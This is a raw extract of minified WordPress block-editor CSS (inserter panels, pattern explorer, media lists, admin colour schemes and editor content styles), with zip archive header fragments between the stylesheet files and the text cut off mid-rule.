(min-width:782px){.block-editor-inserter__category-panel{background:#f0f0f0;border-left:1px solid #e0e0e0;border-top:1px solid #e0e0e0;height:calc(100% + 1px);left:350px;padding:0;position:absolute;top:-1px;width:280px}.block-editor-inserter__category-panel .block-editor-block-patterns-list,.block-editor-inserter__category-panel .block-editor-inserter__media-list{padding:0 24px 16px}}.block-editor-inserter__patterns-category-panel-header{padding:8px 0}@media (min-width:782px){.block-editor-inserter__patterns-category-panel-header{padding:8px 24px}}.block-editor-inserter__patterns-category-no-results{margin-top:24px}.block-editor-inserter__patterns-filter-help{border-top:1px solid #ddd;color:#757575;min-width:280px;padding:16px}.block-editor-block-patterns-list,.block-editor-inserter__media-list{flex-grow:1;height:100%;overflow-y:auto}.block-editor-inserter__preview-content{align-items:center;background:#f0f0f0;display:grid;flex-grow:1}.block-editor-inserter__preview-content-missing{align-items:center;background:#f0f0f0;border-radius:2px;color:#757575;display:flex;flex:1;justify-content:center;min-height:144px}.block-editor-inserter__tips{border-top:1px solid #ddd;flex-shrink:0;padding:16px;position:relative}.block-editor-inserter__quick-inserter{max-width:100%;width:100%}@media (min-width:782px){.block-editor-inserter__quick-inserter{width:350px}}.block-editor-inserter__quick-inserter-results .block-editor-inserter__panel-header{float:left;height:0;padding:0}.block-editor-inserter__quick-inserter.has-expand .block-editor-inserter__panel-content,.block-editor-inserter__quick-inserter.has-search .block-editor-inserter__panel-content{padding:16px}.block-editor-inserter__quick-inserter-patterns .block-editor-block-patterns-list{display:grid;grid-template-columns:1fr 1fr;grid-gap:8px}.block-editor-inserter__quick-inserter-patterns .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{margin-bottom:0}.block-editor-inserter__quick-inserter-patterns .block-editor-block-patterns-list .block-editor-inserter__media-list__list-item{min-height:100px}.block-editor-inserter__quick-inserter-separator{border-top:1px solid #ddd}.block-editor-inserter__popover.is-quick>.components-popover__content{padding:0}.block-editor-inserter__quick-inserter-expand.components-button{background:#1e1e1e;border-radius:0;color:#fff;display:block;width:100%}.block-editor-inserter__quick-inserter-expand.components-button:hover{color:#fff}.block-editor-inserter__quick-inserter-expand.components-button:active{color:#ccc}.block-editor-inserter__quick-inserter-expand.components-button.components-button:focus:not(:disabled){background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color);box-shadow:none}.block-editor-block-patterns-explorer__sidebar{bottom:0;left:0;overflow-x:visible;overflow-y:auto;padding:24px 32px 32px;position:absolute;top:72px;width:280px}.block-editor-block-patterns-explorer__sidebar__categories-list__item{display:block;height:48px;text-align:left;width:100%}.block-editor-block-patterns-explorer__search{margin-bottom:32px}.block-editor-block-patterns-explorer__search-results-count{padding-bottom:32px}.block-editor-block-patterns-explorer__list{margin-left:280px;padding:24px 0 32px}.block-editor-block-patterns-explorer__list .block-editor-patterns__sync-status-filter .components-input-control__container{width:380px}.block-editor-block-patterns-explorer .block-editor-block-patterns-list{display:grid;grid-gap:32px;grid-template-columns:repeat(1,1fr);margin-bottom:16px}@media (min-width:1080px){.block-editor-block-patterns-explorer .block-editor-block-patterns-list{grid-template-columns:repeat(2,1fr)}}@media (min-width:1440px){.block-editor-block-patterns-explorer .block-editor-block-patterns-list{grid-template-columns:repeat(3,1fr)}}.block-editor-block-patterns-explorer .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{min-height:240px}.block-editor-block-patterns-explorer .block-editor-block-patterns-list .block-editor-inserter__media-list__list-item{height:inherit;max-height:800px;min-height:100px}.components-heading.block-editor-inserter__patterns-category-panel-title{font-weight:500}.block-editor-inserter__media-library-button.components-button,.block-editor-inserter__patterns-explore-button.components-button{justify-content:center;margin-top:16px;padding:16px;width:100%}.block-editor-inserter__media-panel{display:flex;flex-direction:column;min-height:100%;padding:0 16px}@media (min-width:782px){.block-editor-inserter__media-panel{padding:0}}.block-editor-inserter__media-panel .block-editor-inserter__media-panel-spinner{align-items:center;display:flex;flex:1;height:100%;justify-content:center}.block-editor-inserter__media-panel .block-editor-inserter__media-panel-search{margin-bottom:24px}@media (min-width:782px){.block-editor-inserter__media-panel .block-editor-inserter__media-panel-search{margin-bottom:0;padding:16px 24px}}.block-editor-inserter__media-list__list-item{cursor:pointer;margin-bottom:24px;position:relative}.block-editor-inserter__media-list__list-item.is-placeholder{min-height:100px}.block-editor-inserter__media-list__list-item[draggable=true] .block-editor-inserter__media-list__list-item{cursor:grab}.block-editor-inserter__media-list__list-item.is-hovered .block-editor-inserter__media-list__item-preview>*{outline-color:#0000004d}.block-editor-inserter__media-list__list-item.is-hovered .block-editor-inserter__media-list__item-preview-options>button{display:block}.block-editor-inserter__media-list__list-item .block-editor-inserter__media-list__item-preview-options{position:absolute;right:8px;top:8px}.block-editor-inserter__media-list__list-item .block-editor-inserter__media-list__item-preview-options>button{background:#fff;display:none}.block-editor-inserter__media-list__list-item .block-editor-inserter__media-list__item-preview-options>button.is-opened,.block-editor-inserter__media-list__list-item .block-editor-inserter__media-list__item-preview-options>button:focus{display:block}.block-editor-inserter__media-list__list-item .block-editor-inserter__media-list__item-preview-options>button:hover{box-shadow:inset 0 0 0 2px #fff,0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.block-editor-inserter__media-list__item{height:100%}.block-editor-inserter__media-list__item .block-editor-inserter__media-list__item-preview{align-items:center;border-radius:2px;display:flex;overflow:hidden}.block-editor-inserter__media-list__item .block-editor-inserter__media-list__item-preview>*{margin:0 auto;max-width:100%;outline:1px solid #0000001a;outline-offset:-1px}.block-editor-inserter__media-list__item .block-editor-inserter__media-list__item-preview .block-editor-inserter__media-list__item-preview-spinner{align-items:center;background:#ffffffb3;display:flex;height:100%;justify-content:center;pointer-events:none;position:absolute;width:100%}.block-editor-inserter__media-list__item:focus .block-editor-inserter__media-list__item-preview>*{outline-color:var(--wp-admin-theme-color);outline-offset:calc(var(--wp-admin-border-width-focus)*-1);outline-width:var(--wp-admin-border-width-focus)}@media not (prefers-reduced-motion){.block-editor-inserter__media-list__item:focus .block-editor-inserter__media-list__item-preview>*{transition:outline .1s linear}}.block-editor-inserter__media-list__item-preview-options__popover .components-menu-item__button .components-menu-item__item{min-width:auto}.block-editor-inserter__mobile-tab-navigation{height:100%;padding:16px}.block-editor-inserter__mobile-tab-navigation>*{height:100%}@media (min-width:600px){.block-editor-inserter-media-tab-media-preview-inserter-external-image-modal{max-width:480px}}.block-editor-inserter-media-tab-media-preview-inserter-external-image-modal p{margin:0}.block-editor-inserter__hint{margin:16px 16px 0}.block-editor-patterns__sync-status-filter .components-input-control__container select.components-select-control__input{height:40px}.block-editor-inserter__pattern-panel-placeholder{display:none}.block-editor-inserter__menu.is-zoom-out{display:flex}@media (min-width:782px){.block-editor-inserter__menu.is-zoom-out.show-panel:after{content:"";display:block;height:100%;width:300px}}@media (max-width:959px){.show-icon-labels .block-editor-block-patterns-explorer .block-editor-patterns__grid-pagination,.show-icon-labels .block-editor-block-patterns-explorer .block-editor-patterns__grid-pagination .block-editor-patterns__grid-pagination-next,.show-icon-labels .block-editor-block-patterns-explorer .block-editor-patterns__grid-pagination .block-editor-patterns__grid-pagination-previous{flex-direction:column}}.show-icon-labels .block-editor-inserter__category-panel .block-editor-patterns__grid-pagination,.show-icon-labels .block-editor-inserter__category-panel .block-editor-patterns__grid-pagination .block-editor-patterns__grid-pagination-next,.show-icon-labels .block-editor-inserter__category-panel .block-editor-patterns__grid-pagination .block-editor-patterns__grid-pagination-previous{flex-direction:column}.block-editor-tabbed-sidebar__tabpanel .block-editor-inserter__help-text{display:none;padding:0 24px 16px}@media (min-width:480px){.block-editor-tabbed-sidebar__tabpanel .block-editor-inserter__help-text{display:block}}.spacing-sizes-control{border:0;margin:0;padding:0}.spacing-sizes-control .spacing-sizes-control__custom-value-input,.spacing-sizes-control .spacing-sizes-control__label{margin-bottom:0}.spacing-sizes-control .spacing-sizes-control__custom-value-range,.spacing-sizes-control .spacing-sizes-control__range-control{flex:1;margin-bottom:0}.spacing-sizes-control__header{height:16px;margin-bottom:12px}.spacing-sizes-control__dropdown{height:24px}.spacing-sizes-control__custom-select-control,.spacing-sizes-control__custom-value-input{flex:1}.spacing-sizes-control__custom-toggle,.spacing-sizes-control__icon{flex:0 0 auto}.spacing-sizes-control__icon{margin-left:-4px}body.admin-color-light{--wp-admin-theme-color:#0085ba;--wp-admin-theme-color--rgb:0,133,186;--wp-admin-theme-color-darker-10:#0073a1;--wp-admin-theme-color-darker-10--rgb:0,114.7661290323,160.5;--wp-admin-theme-color-darker-20:#006187;--wp-admin-theme-color-darker-20--rgb:0,96.5322580645,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-light{--wp-admin-border-width-focus:1.5px}}body.admin-color-modern{--wp-admin-theme-color:#3858e9;--wp-admin-theme-color--rgb:56,88,233;--wp-admin-theme-color-darker-10:#2145e6;--wp-admin-theme-color-darker-10--rgb:33.0384615385,68.7307692308,230.4615384615;--wp-admin-theme-color-darker-20:#183ad6;--wp-admin-theme-color-darker-20--rgb:23.6923076923,58.1538461538,214.3076923077;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-modern{--wp-admin-border-width-focus:1.5px}}body.admin-color-blue{--wp-admin-theme-color:#096484;--wp-admin-theme-color--rgb:9,100,132;--wp-admin-theme-color-darker-10:#07526c;--wp-admin-theme-color-darker-10--rgb:7.3723404255,81.914893617,108.1276595745;--wp-admin-theme-color-darker-20:#064054;--wp-admin-theme-color-darker-20--rgb:5.7446808511,63.829787234,84.2553191489;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-blue{--wp-admin-border-width-focus:1.5px}}body.admin-color-coffee{--wp-admin-theme-color:#46403c;--wp-admin-theme-color--rgb:70,64,60;--wp-admin-theme-color-darker-10:#383330;--wp-admin-theme-color-darker-10--rgb:56.2692307692,51.4461538462,48.2307692308;--wp-admin-theme-color-darker-20:#2b2724;--wp-admin-theme-color-darker-20--rgb:42.5384615385,38.8923076923,36.4615384615;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-coffee{--wp-admin-border-width-focus:1.5px}}body.admin-color-ectoplasm{--wp-admin-theme-color:#523f6d;--wp-admin-theme-color--rgb:82,63,109;--wp-admin-theme-color-darker-10:#46365d;--wp-admin-theme-color-darker-10--rgb:69.8430232558,53.6598837209,92.8401162791;--wp-admin-theme-color-darker-20:#3a2c4d;--wp-admin-theme-color-darker-20--rgb:57.6860465116,44.3197674419,76.6802325581;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ectoplasm{--wp-admin-border-width-focus:1.5px}}body.admin-color-midnight{--wp-admin-theme-color:#e14d43;--wp-admin-theme-color--rgb:225,77,67;--wp-admin-theme-color-darker-10:#dd382d;--wp-admin-theme-color-darker-10--rgb:221.4908256881,56.1788990826,45.0091743119;--wp-admin-theme-color-darker-20:#d02c21;--wp-admin-theme-color-darker-20--rgb:207.8348623853,44.2201834862,33.1651376147;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-midnight{--wp-admin-border-width-focus:1.5px}}body.admin-color-ocean{--wp-admin-theme-color:#627c83;--wp-admin-theme-color--rgb:98,124,131;--wp-admin-theme-color-darker-10:#576e74;--wp-admin-theme-color-darker-10--rgb:87.0873362445,110.192139738,116.4126637555;--wp-admin-theme-color-darker-20:#4c6066;--wp-admin-theme-color-darker-20--rgb:76.1746724891,96.384279476,101.8253275109;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ocean{--wp-admin-border-width-focus:1.5px}}body.admin-color-sunrise{--wp-admin-theme-color:#dd823b;--wp-admin-theme-color--rgb:221,130,59;--wp-admin-theme-color-darker-10:#d97426;--wp-admin-theme-color-darker-10--rgb:216.8782608696,116.1847826087,37.6217391304;--wp-admin-theme-color-darker-20:#c36922;--wp-admin-theme-color-darker-20--rgb:195.147826087,104.5434782609,33.852173913;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-sunrise{--wp-admin-border-width-focus:1.5px}}PK! E  3dist/block-editor/default-editor-styles-rtl.min.cssnuȯbody{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:18px;line-height:1.5;--wp--style--block-gap:2em}p{line-height:1.8}.editor-post-title__block{font-size:2.5em;font-weight:800;margin-bottom:1em;margin-top:2em}PK!OcQQdist/block-editor/content.cssnuȯ:root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .block-editor-block-icon{ align-items:center; display:flex; height:24px; justify-content:center; width:24px; } .block-editor-block-icon.has-colors svg{ fill:currentColor; } @media (forced-colors:active){ .block-editor-block-icon.has-colors svg{ fill:CanvasText; } } .block-editor-block-icon svg{ max-height:24px; max-width:24px; min-height:20px; min-width:20px; } .block-editor-block-styles .block-editor-block-list__block{ margin:0; } @keyframes selection-overlay__fade-in-animation{ 0%{ opacity:0; } to{ opacity:.4; } } :root .block-editor-block-list__layout::selection,:root [data-has-multi-selection=true] .block-editor-block-list__layout::selection,_::-webkit-full-page-media,_:future{ background-color:initial; } .block-editor-block-list__layout{ position:relative; } .block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected) ::selection,.block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected)::selection{ background:#0000; } .block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected):after{ background:var(--wp-admin-theme-color); bottom:0; content:""; left:0; opacity:.4; pointer-events:none; position:absolute; right:0; top:0; z-index:1; } @media not (prefers-reduced-motion){ .block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected):after{ animation:selection-overlay__fade-in-animation .1s ease-out; animation-fill-mode:forwards; } } .block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected):after{ outline:2px solid #0000; } .block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected).is-highlighted:after{ outline-color:#0000; } .block-editor-block-list__layout .block-editor-block-list__block.is-highlighted,.block-editor-block-list__layout .block-editor-block-list__block.is-highlighted~.is-multi-selected,.block-editor-block-list__layout .block-editor-block-list__block:not([contenteditable=true]):focus{ outline:none; } .block-editor-block-list__layout .block-editor-block-list__block.is-highlighted:after,.block-editor-block-list__layout .block-editor-block-list__block.is-highlighted~.is-multi-selected:after,.block-editor-block-list__layout .block-editor-block-list__block:not([contenteditable=true]):focus:after{ bottom:0; content:""; left:0; outline-color:var(--wp-admin-theme-color); outline-offset:calc(var(--wp-admin-border-width-focus)*-1/var(--wp-block-editor-iframe-zoom-out-scale, 1)); outline-style:solid; outline-width:calc(var(--wp-admin-border-width-focus)*1/var(--wp-block-editor-iframe-zoom-out-scale, 1)); pointer-events:none; position:absolute; right:0; top:0; z-index:1; } .block-editor-block-list__layout .block-editor-block-list__block.is-block-hidden{ border:none !important; height:0; overflow:hidden; padding:0 !important; visibility:hidden; } .block-editor-block-list__layout.is-layout-flex:not(.is-vertical)>.is-block-hidden{ align-self:stretch; height:auto; white-space:nowrap !important; width:0; } .block-editor-block-list__layout [class^=components-]{ -webkit-user-select:text; user-select:text; } .block-editor-block-list__layout .block-editor-block-list__block{ overflow-wrap:break-word; pointer-events:auto; position:relative; } .block-editor-block-list__layout .block-editor-block-list__block.is-editing-disabled{ pointer-events:none; } .block-editor-block-list__layout .block-editor-block-list__block.has-negative-margin.has-child-selected,.block-editor-block-list__layout .block-editor-block-list__block.has-negative-margin.is-selected{ z-index:20; } .block-editor-block-list__layout .block-editor-block-list__block .reusable-block-edit-panel *{ z-index:1; } .block-editor-block-list__layout .block-editor-block-list__block .components-placeholder .components-with-notices-ui{ margin:-10px 0 12px; } .block-editor-block-list__layout .block-editor-block-list__block .components-with-notices-ui{ margin:0 0 12px; width:100%; } .block-editor-block-list__layout .block-editor-block-list__block .components-with-notices-ui .components-notice .components-notice__content{ font-size:13px; } .block-editor-block-list__layout .block-editor-block-list__block.has-warning{ min-height:48px; } .block-editor-block-list__layout .block-editor-block-list__block.has-warning>*{ pointer-events:none; -webkit-user-select:none; user-select:none; } .block-editor-block-list__layout .block-editor-block-list__block.has-warning .block-editor-warning{ pointer-events:all; } .block-editor-block-list__layout .block-editor-block-list__block.has-warning:after{ background-color:#fff6; bottom:0; content:""; left:0; position:absolute; right:0; top:0; } .block-editor-block-list__layout .block-editor-block-list__block.has-warning.is-multi-selected:after{ background-color:initial; } .block-editor-block-list__layout .block-editor-block-list__block.is-reusable.has-child-selected:after{ box-shadow:0 0 0 1px var(--wp-admin-theme-color); } .block-editor-block-list__layout .block-editor-block-list__block[data-clear=true]{ float:none; } .block-editor-block-list__layout .block-editor-block-list__block:not([data-draggable=true]),.block-editor-block-list__layout .block-editor-block-list__block:not([draggable=true]){ cursor:default; } .block-editor-block-list__layout .block-editor-block-list__block[data-draggable=true],.block-editor-block-list__layout .block-editor-block-list__block[draggable=true]{ cursor:grab; } .block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected{ cursor:default; } .block-editor-block-list__layout .block-editor-block-list__block [contenteditable],.block-editor-block-list__layout .block-editor-block-list__block[contenteditable]{ cursor:text; } .is-outline-mode .block-editor-block-list__block:not(.remove-outline).is-hovered:not(.is-selected):after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline):not(.rich-text):not([contenteditable=true]).is-selected:after{ bottom:0; content:""; left:0; outline-color:var(--wp-admin-theme-color); outline-offset:calc(var(--wp-admin-border-width-focus)*-1/var(--wp-block-editor-iframe-zoom-out-scale, 1)); outline-style:solid; outline-width:calc(var(--wp-admin-border-width-focus)*1/var(--wp-block-editor-iframe-zoom-out-scale, 1)); pointer-events:none; position:absolute; right:0; top:0; } .is-outline-mode .block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).is-reusable.is-highlighted:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).is-reusable.is-hovered:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).is-reusable.is-selected:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.block-editor-block-list__block:not([contenteditable]):focus:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-highlighted:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-hovered:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-selected:after{ outline-color:var(--wp-block-synced-color); } @keyframes block-editor-is-editable__animation{ 0%{ background-color:rgba(var(--wp-admin-theme-color--rgb), .1); } to{ background-color:rgba(var(--wp-admin-theme-color--rgb), 0); } } @keyframes block-editor-is-editable__animation_reduce-motion{ 0%{ background-color:rgba(var(--wp-admin-theme-color--rgb), .1); } 99%{ background-color:rgba(var(--wp-admin-theme-color--rgb), .1); } to{ background-color:rgba(var(--wp-admin-theme-color--rgb), 0); } } .is-root-container:not([inert]) .block-editor-block-list__block.is-selected .block-editor-block-list__block.has-editable-outline:after{ animation-delay:.1s; animation-duration:.8s; animation-fill-mode:backwards; animation-name:block-editor-is-editable__animation; animation-timing-function:ease-out; bottom:0; content:""; left:0; pointer-events:none; position:absolute; right:0; top:0; } @media (prefers-reduced-motion:reduce){ .is-root-container:not([inert]) .block-editor-block-list__block.is-selected .block-editor-block-list__block.has-editable-outline:after{ animation-delay:0s; animation-name:block-editor-is-editable__animation_reduce-motion; } } .is-focus-mode .block-editor-block-list__block:not(.has-child-selected){ opacity:.2; } @media not (prefers-reduced-motion){ .is-focus-mode .block-editor-block-list__block:not(.has-child-selected){ transition:opacity .1s linear; } } .is-focus-mode .block-editor-block-list__block.is-content-locked-temporarily-editing-as-blocks.has-child-selected,.is-focus-mode .block-editor-block-list__block.is-content-locked-temporarily-editing-as-blocks.has-child-selected .block-editor-block-list__block,.is-focus-mode .block-editor-block-list__block.is-content-locked.has-child-selected,.is-focus-mode .block-editor-block-list__block.is-content-locked.has-child-selected .block-editor-block-list__block,.is-focus-mode .block-editor-block-list__block:not(.has-child-selected) .block-editor-block-list__block,.is-focus-mode .block-editor-block-list__block:not(.has-child-selected).is-multi-selected,.is-focus-mode .block-editor-block-list__block:not(.has-child-selected).is-selected{ opacity:1; } .wp-block.alignleft,.wp-block.alignright,.wp-block[data-align=left]>*,.wp-block[data-align=right]>*{ z-index:21; } .wp-site-blocks>[data-align=left]{ float:left; margin-right:2em; } .wp-site-blocks>[data-align=right]{ float:right; margin-left:2em; } .wp-site-blocks>[data-align=center]{ justify-content:center; margin-left:auto; margin-right:auto; } .block-editor-block-list .block-editor-inserter{ cursor:move; cursor:grab; margin:8px; } @keyframes block-editor-inserter__toggle__fade-in-animation{ 0%{ opacity:0; } to{ opacity:1; } } @media not (prefers-reduced-motion){ .wp-block .block-list-appender .block-editor-inserter__toggle{ animation:block-editor-inserter__toggle__fade-in-animation .1s ease; animation-fill-mode:forwards; } } .block-editor-block-list__block:not(.is-selected):not(.has-child-selected) .block-editor-default-block-appender{ display:none; } .block-editor-block-list__block:not(.is-selected):not(.has-child-selected) .block-editor-default-block-appender .block-editor-inserter__toggle{ opacity:0; transform:scale(0); } .block-editor-block-list__block .block-editor-block-list__block-html-textarea{ border:none; border-radius:2px; box-shadow:inset 0 0 0 1px #1e1e1e; box-sizing:border-box; display:block; font-family:Menlo,Consolas,monaco,monospace; font-size:15px; line-height:1.5; margin:0; outline:none; overflow:hidden; padding:12px; resize:none; width:100%; } @media not (prefers-reduced-motion){ .block-editor-block-list__block .block-editor-block-list__block-html-textarea{ transition:padding .2s linear; } } .block-editor-block-list__block .block-editor-block-list__block-html-textarea:focus{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .block-editor-block-list__block .block-editor-warning{ position:relative; z-index:5; } .block-editor-block-list__block .block-editor-warning.block-editor-block-list__block-crash-warning{ margin-bottom:auto; } .block-editor-block-list__zoom-out-separator{ background:#ddd; margin-left:-1px; margin-right:-1px; } @media not (prefers-reduced-motion){ .block-editor-block-list__zoom-out-separator{ transition:background-color .3s ease; } } .block-editor-block-list__zoom-out-separator{ align-items:center; color:#000; display:flex; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; justify-content:center; overflow:hidden; } .is-zoomed-out .block-editor-block-list__zoom-out-separator{ font-size:calc(13px/var(--wp-block-editor-iframe-zoom-out-scale)); } .block-editor-block-list__zoom-out-separator.is-dragged-over{ background:#ccc; } .block-editor-block-list__layout.is-root-container.has-global-padding>.block-editor-block-list__zoom-out-separator,.has-global-padding>.block-editor-block-list__zoom-out-separator{ margin:0 calc(var(--wp--style--root--padding-right)*-1 - 1px) 0 calc(var(--wp--style--root--padding-left)*-1 - 1px) !important; max-width:none; } .is-dragging{ cursor:grabbing; } .is-vertical .block-list-appender{ margin-left:12px; margin-right:auto; margin-top:12px; width:24px; } .block-list-appender>.block-editor-inserter{ display:block; } .block-editor-block-list__block:not(.is-selected):not(.has-child-selected):not(.block-editor-block-list__layout) .block-editor-block-list__layout>.block-list-appender .block-list-appender__toggle{ opacity:0; transform:scale(0); } .block-editor-block-list__block.has-block-overlay{ cursor:default; } .block-editor-block-list__block.has-block-overlay .block-editor-block-list__block{ pointer-events:none; } .block-editor-block-list__block.has-block-overlay .block-editor-block-list__block.has-block-overlay:before{ left:0; right:0; width:auto; } .block-editor-block-list__layout .is-dragging{ opacity:.1; } .block-editor-block-list__layout .is-dragging iframe{ pointer-events:none; } .block-editor-block-list__layout .is-dragging::selection{ background:#0000 !important; } .block-editor-block-list__layout .is-dragging:after{ content:none !important; } .wp-block img:not([draggable]),.wp-block svg:not([draggable]){ pointer-events:none; } .block-editor-block-preview__content-iframe .block-list-appender{ display:none; } .block-editor-block-preview__live-content *{ pointer-events:none; } .block-editor-block-preview__live-content .block-list-appender{ display:none; } .block-editor-block-preview__live-content .components-button:disabled{ opacity:1; } .block-editor-block-preview__live-content .block-editor-block-list__block[data-empty=true],.block-editor-block-preview__live-content .components-placeholder{ display:none; } .block-editor-block-variation-picker__skip,.block-editor-block-variation-picker__variations,.wp-block-group-placeholder__variations{ display:flex; flex-direction:row; flex-wrap:wrap; font-size:12px; gap:8px; justify-content:flex-start; list-style:none; margin:0; padding:0; width:100%; } .block-editor-block-variation-picker__skip svg,.block-editor-block-variation-picker__variations svg,.wp-block-group-placeholder__variations svg{ fill:#949494 !important; } .block-editor-block-variation-picker__skip .components-button,.block-editor-block-variation-picker__variations .components-button,.wp-block-group-placeholder__variations .components-button{ padding:4px; } .block-editor-block-variation-picker__skip .components-button:hover,.block-editor-block-variation-picker__variations .components-button:hover,.wp-block-group-placeholder__variations .components-button:hover{ background:none !important; } .block-editor-block-variation-picker__skip .components-button:hover svg,.block-editor-block-variation-picker__variations .components-button:hover svg,.wp-block-group-placeholder__variations .components-button:hover svg{ fill:var(--wp-admin-theme-color) !important; } .block-editor-block-variation-picker__skip>li,.block-editor-block-variation-picker__variations>li,.wp-block-group-placeholder__variations>li{ align-items:center; display:flex; flex-direction:column; gap:4px; width:auto; } .block-editor-button-block-appender{ align-items:center; box-shadow:inset 0 0 0 1px #1e1e1e; color:#1e1e1e; display:flex; flex-direction:column; height:auto; justify-content:center; width:100%; } .is-dark-theme .block-editor-button-block-appender{ box-shadow:inset 0 0 0 1px #ffffffa6; color:#ffffffa6; } .block-editor-button-block-appender:hover{ box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color); color:var(--wp-admin-theme-color); } .block-editor-button-block-appender:focus{ box-shadow:inset 0 0 0 2px var(--wp-admin-theme-color); } .block-editor-button-block-appender:active{ color:#000; } .block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child{ pointer-events:none; } .block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child:after,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child:after,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child:after,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child:after{ border:1px dashed; bottom:0; content:""; left:0; pointer-events:none; position:absolute; right:0; top:0; } .block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child .block-editor-inserter,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child .block-editor-inserter,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child .block-editor-inserter,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child .block-editor-inserter{ opacity:0; } .block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child .block-editor-inserter:focus-within,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child .block-editor-inserter:focus-within,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child .block-editor-inserter:focus-within,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child .block-editor-inserter:focus-within{ opacity:1; } .block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child.is-drag-over:after,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child.is-drag-over:after,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child.is-drag-over:after,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child.is-drag-over:after{ border:none; } .block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child.is-drag-over .block-editor-inserter,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child.is-drag-over .block-editor-inserter,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child.is-drag-over .block-editor-inserter,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child.is-drag-over .block-editor-inserter{ visibility:visible; } .block-editor-block-list__block:not(.is-selected)>.block-editor-block-list__block>.block-list-appender:only-child:after{ border:none; } .block-list-appender:only-child.is-drag-over .block-editor-button-block-appender{ background-color:var(--wp-admin-theme-color); box-shadow:inset 0 0 0 1px #ffffffa6; color:#ffffffa6; } @media not (prefers-reduced-motion){ .block-list-appender:only-child.is-drag-over .block-editor-button-block-appender{ transition:background-color .2s ease-in-out; } } .block-editor-default-block-appender{ clear:both; margin-left:auto; margin-right:auto; position:relative; } .block-editor-default-block-appender[data-root-client-id=""] 